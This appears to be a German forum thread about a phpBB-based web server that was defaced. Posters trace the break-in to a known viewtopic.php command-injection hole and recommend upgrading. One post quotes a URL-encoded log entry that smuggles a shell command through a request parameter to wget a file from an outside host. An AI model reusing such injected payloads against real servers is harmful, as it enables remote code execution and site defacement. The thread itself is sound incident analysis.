|
Server gehacked
Ein Bekannter von mir wurde von Boxocide und ESX heimgesucht.
boxocide Er hat einen GNU/Linux Webserver laufen mit Apache 2.0.51 (php und mysql versionen sind mir zurzeit nicht bekannt) - basierend auf FC2. Nachdem ich mir die Logfiles angesehen hab bin ich mir nicht sicher, wie die reingekommen sind. Jedenfalls wurden im DocumentRoot der Hauptseite (phpBB basierend) die wichtigsten Files durch .html files ersetzt. Daneben laufen noch einige kleine Seiten, die durch Virtualhosts betrieben werden - welche jedoch alle durch .htaccess vom public-Zugriff abgeschirmt werden. Der Server wird sowieso komplett neu aufgesetzt, da meine Fähigkeiten nicht ausreichen, um wirklich alles zu checken. Einen Rootkit-Checker hab ich schon ausgeführt, der hat nichts Verdächtiges gefunden. Nach langer Sucherei in den Logfiles ist mir jedoch folgendes aufgefallen: (aus der access_log von Apache): Zitat:
Dann kommt das error_log: Zitat:
Und: Zitat:
Desweiteren scheint es, als ob group, shadow usw. in /etc auch geändert wurden, da es mit dem Änderungsdatum der index-Files im DocumentRoot übereinstimmt. Genaueres kann ich erst sagen, wenn ich den Serverbetreiber ausflaschel. Kann man mit diesen Angaben eine ungefähre Aussage tätigen, wie die da reingekommen sind ? Ist es möglich, über phpBB Schwachstellen shell access zu ergaunern ? Wie gesagt, der Server wird komplett neu aufgesetzt und ich habe weder das Wissen, noch das Interesse das komplette System forensisch zu untersuchen. Denn was ich finden werde (im Fall des Falles) bringt sowieso nix, da ich annehme, dass die so gscheit sind und ihre Spuren verwischt haben. Vielen Dank für Tips |
Läuft auch PHPNuke?
Sloter |
Zusatzfrage:
Soweit ich weiß bedeuten die %xx Angaben Strings - wie kann ich diese in Strings umwandeln sodaß ich genau sehe, was die für eine Syntax für viewtopic.php genutzt haben ? |
Zitat:
Edit: http://www.heise.de/security/news/meldung/53511 Hmmm. |
Gar nicht mal so alt.
http://www.heise.de/security/news/meldung/53511 PHPNuke auf einem anderen virtuellen Host? Sloter |
Zitat:
Alle anderen "Seiten" sind eher Admin-Tools, welche aber durch .htaccess abgesichert sind. Und ich habe nirgends in den Logs einen Zugriff auf diese Seiten gesehen. Ich gehe davon aus, dass ein Zugriff über phpBB statt gefunden hat. |
Re: Server gehacked
Zitat:
rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77 %67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7 3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63% 6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45 %4E%44%5F Übersetzt man das mittels urldecode(), kommt folgendes zum Vorschein: |
Hmmm,
also bedeuted das, dass besagte wget Aufrufe durch Mißbrauch der viewtopic.php stattgefunden haben ? Also in Wahrheit nie shell access ergaunert wurde, sondern alle Befehle mittels viewtopic.php ausgeführt wurden ? Alle besagten bösen viewtopic.php Gebräuche in der haha.txt. Edit: Hier ein paar "übersetzte" Befehle: Zitat:
Najo, sei Schuld. Und noch was gefunden: Zitat:
Zusatzfrage: Die IPs sind natürlich gespeichert, eine ist klar zuordnungsbar, zwar eine dynamische IP aus Dallas, dennoch kein anon-proxy. Spoofing sollte nicht möglich sein, da auf dem GNU/Linux server auch eine iptables firewall gelaufen ist. Tjo, ich schätz mal dies als Musterbeispiel geltend zu machen, was passiert, wenn man ein Script benutzt, das fehleranfällig ist und vorallem, nicht upzudaten und deppat root details zu nutzen, um mysql auszuführen. Irgend eine Chance, mit den IPs den Verursachern zumindest auf die Finger zu klopfen ? |
Zitat:
Zitat:
Ich würde allen die phpBB einsetzen dringend raten auf phpBB 2.0.11 zu upgraden. |
Ich denke es wäre trotzdem ratsam, den Server komplett neu aufzusetzen?
Und diesmal mach ich es, dass nix mehr rooterei passiert :D |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 12:34 Uhr. |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 2009 FSL Verlag